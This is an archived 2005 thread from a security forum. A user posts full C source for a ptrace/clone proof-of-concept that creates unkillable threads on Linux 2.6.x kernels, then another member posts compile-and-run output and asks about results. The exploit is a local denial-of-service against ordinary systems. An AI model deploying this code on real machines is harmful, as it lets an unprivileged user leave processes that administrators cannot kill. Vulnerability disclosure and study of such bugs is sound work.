Waraxe IT Security Portal

:: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools ::

November 21, 2024

Menu

Home

Logout

Discussions

	Forums
	Members List
	IRC chat

Tools

	Base64 coder
	MD5 hash
	CRC32 checksum
	ROT13 coder
	SHA-1 hash
	URL-decoder
	Sql Char Encoder

Affiliates

	y3dips ITsec
	Md5 Cracker
	User Manuals
	AlbumNow

Content

	Content
	Sections
	FAQ
	Top

Info

	Feedback
	Recommend Us
	Search
	Journal
	Your Account

User Info

Membership:

Latest: MichaelSnaRe

New Today: 0

New Yesterday: 0

Overall: 9144

People Online:

Visitors: 115

Members: 0

Total: 115

Full disclosure

SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1

IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Linux world -> Linux 2.6.x Unkillable Thread Creation Issue
	View previous topic :: View next topic

Linux 2.6.x Unkillable Thread Creation Issue

Posted: Tue Sep 13, 2005 9:44 pm

erg0t

Valuable expert

Joined: Apr 08, 2005

Posts: 55

Location: Uruguay

Hi, I found a way to create unkillable threads on 2.6.x kernels (it seems that versions <=2.6.8 aren't vuln). I send to frsirt and nothing, then milw0rm and they are testing, so I post here Smile

Code:

/* mate.c - Linux unkillable thread issue
*
* Exploit demostration by erg0t (ergot86@gmail.com)
* Tested only in some 2.6.x kernels
*
*/

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sched.h>

#define PTRACE_EVENT_CLONE 3
#define PTRACE_SETOPTIONS 0x4200
#define PTRACE_GETEVENTMSG 0x4201
#define PTRACE_O_TRACECLONE 0x00000008

int inmortal(void *arg) { _exit(0) ; }

int main(int argc,char *argv[])
{

pid_t pid, npid ;
int status, event ;
char *stack ;

printf("\n Linux 2.6.x Unkillable thread creation issue (ergot86@gmail.com)\n") ;
pid = fork();
if (pid == 0)
{
pid = getpid() ;
printf("\n [%d] Child started \n",pid) ;
if (ptrace(PTRACE_TRACEME,0,NULL,NULL) != 0)
{
printf(" [%d] Can't attach, aborted\n",pid) ;
kill(getppid(),SIGKILL) ;
exit(1) ;
}
kill(pid,SIGSTOP) ;
stack = malloc(4096) ;
if (stack == NULL)
{
printf(" [%d] Can't allocate memory, aborted\n",pid) ;
kill(getppid(),SIGKILL) ;
exit(1) ;
}
printf(" [%d] Thread Stack at %x\n",pid,stack) ;
npid = clone(inmortal,&stack[4095],CLONE_PARENT | CLONE_VM,NULL) ;
printf(" [%d] Clone = %d\n",pid,npid) ;
kill(npid,SIGINT) ;
kill(pid,SIGINT) ;
_exit(0) ;
}
if (pid == -1)
{
printf(" [%d] Can't fork, aborted\n",getpid()) ;
exit(1) ;
}
wait(NULL) ;
ptrace(PTRACE_SETOPTIONS,pid,NULL,PTRACE_O_TRACECLONE) ;
ptrace(PTRACE_CONT,pid,NULL,0) ;
Loop:
npid = wait4(-1,&status,0,0) ;
if (WIFSTOPPED(status))
{
if (WSTOPSIG(status) == SIGTRAP)
{
event = (status >> 16) & 0xffff ;
ptrace(PTRACE_GETEVENTMSG,pid,NULL,&npid) ;
if (event == PTRACE_EVENT_CLONE)
{
printf(" [%d] clone event!\n",npid) ;
ptrace(PTRACE_CONT,pid,NULL,WSTOPSIG(status)) ;
ptrace(PTRACE_CONT,npid,NULL,WSTOPSIG(status)) ;
}
else
{
printf(" [%d] trap, continuing\n",npid) ;
ptrace(PTRACE_CONT,pid,NULL,WSTOPSIG(status)) ;
ptrace(PTRACE_CONT,npid,NULL,WSTOPSIG(status)) ;
}
}
else if (WSTOPSIG(status) == SIGINT)
{
printf(" Exiting\n\n") ;
exit(0) ;
}
else
{
printf(" [%d] Signal (%d), continuing\n",npid,WSTOPSIG(status)) ;
ptrace(PTRACE_CONT,pid,NULL,WSTOPSIG(status)) ;
ptrace(PTRACE_CONT,npid,NULL,WSTOPSIG(status)) ;
}
}
goto Loop ;

// Al dope.. xD
return 0 ;
}

Posted: Fri Sep 16, 2005 2:25 pm

LINUX

Moderator

Joined: May 24, 2004

Posts: 404

Location: Caiman

this nigth i test a send logs Smile

Posted: Sun Sep 18, 2005 1:19 pm

y3dips

Valuable expert

Joined: Feb 25, 2005

Posts: 281

Location: Indonesia

hum, it doesnt work on my ubuntu

Code:

y3dips@heaven:~$ uname -a
Linux heaven 2.6.10-5-386 #1 Thu Sep 8 06:18:41 UTC 2005 i686 GNU/Linux
y3dips@heaven:~$ gedit mate.c
y3dips@heaven:~$ gcc -o mate mate.c
y3dips@heaven:~$ ./mate

Linux 2.6.x Unkillable thread creation issue (ergot86@gmail.com)

[8462] Child started
[8462] Thread Stack at 804a008
[8463] clone event!
[8462] Clone = 8463
Exiting

y3dips@heaven:~$ ps -awx | grep mate
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Do i have to be root to do that ?
or it is not listed in PS command ??

_________________
IO::y3dips->new(http://clog.ammar.web.id);

Posted: Mon Sep 19, 2005 1:27 am

erg0t

Valuable expert

Joined: Apr 08, 2005

Posts: 55

Location: Uruguay

you don't need to be root.
try: ps aux | grep mate

Linux 2.6.x Unkillable Thread Creation Issue

www.waraxe.us Forum Index -> Linux world

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

All times are GMT
Page 1 of 1

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds